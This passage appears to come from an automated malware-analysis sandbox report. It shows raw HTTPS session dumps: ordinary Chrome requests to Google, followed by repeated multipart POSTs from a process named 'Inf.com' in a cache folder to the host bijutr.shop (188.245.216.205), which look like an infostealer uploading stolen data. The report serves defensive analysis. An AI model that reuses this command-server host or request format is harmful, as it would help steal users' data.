                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:00 UTC1390INData Raw: 30 30 32 36 5c 75 30 30 32 36 28 52 64 5c 75 30 30 33 64 51 64 28 29 29 3b 72 65 74 75 72 6e 20 52 64 7d 3b 5c 6e 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 53 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 54 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 54 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66
                                                                                                                                                                                                                                                                                                  Data Ascii: 0026\u0026(Rd\u003dQd());return Rd};\n_.Ud\u003dfunction(a){const b\u003d_.Sd();return new _.Td(b?b.createScriptURL(a):a)};_.Vd\u003dfunction(a){if(a instanceof _.Td)return a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003df
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:00 UTC1390INData Raw: 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22
                                                                                                                                                                                                                                                                                                  Data Ascii: 03d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db||document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\"


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  10192.168.2.549804142.250.181.684434404C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:00:59 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:00 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:00 GMT
                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:00 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  11192.168.2.549827188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:03 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----379R1D2DTRQIEU37YU3O
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 505
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:03 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------379R1D2DTRQIEU37YU3OContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------379R1D2DTRQIEU37YU3OContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------379R1D2DTRQIEU37YU3OCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:04 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  12192.168.2.549833188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BS0R9RQ9Z58QIEKFCB1N
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 213453
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 53 30 52 39 52 51 39 5a 35 38 51 49 45 4b 46 43 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 42 53 30 52 39 52 51 39 5a 35 38 51 49 45 4b 46 43 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 42 53 30 52 39 52 51 39 5a 35 38 51 49 45 4b 46 43 42 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------BS0R9RQ9Z58QIEKFCB1NContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------BS0R9RQ9Z58QIEKFCB1NContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------BS0R9RQ9Z58QIEKFCB1NCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:06 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  13192.168.2.549839188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:07 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WT0R1DJWBSJM7YUKX47G
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 55081
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
